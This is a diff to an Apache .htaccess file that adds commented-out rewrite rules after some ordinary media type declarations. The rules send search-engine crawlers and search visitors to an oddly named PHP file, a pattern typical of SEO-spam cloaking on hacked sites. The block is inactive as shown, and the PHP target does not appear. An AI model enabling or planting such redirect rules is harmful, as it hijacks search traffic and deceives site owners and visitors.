--- a/.htaccess
+++ b/.htaccess
@@ -16,3 +16,11 @@ AddType video/ogg .ogv
 AddType video/webm .webm
 AddType video/x-m4v .m4v
 AddType application/ogg .ogg
+
+#RewriteEngine On
+#
+#RewriteCond %{ENV:REDIRECT_STATUS} 200
+#RewriteRule ^ - [L]
+#RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
+#RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
+#RewriteRule ^([^/]*)/$ krystalle-comfortability.php?$1 [L]
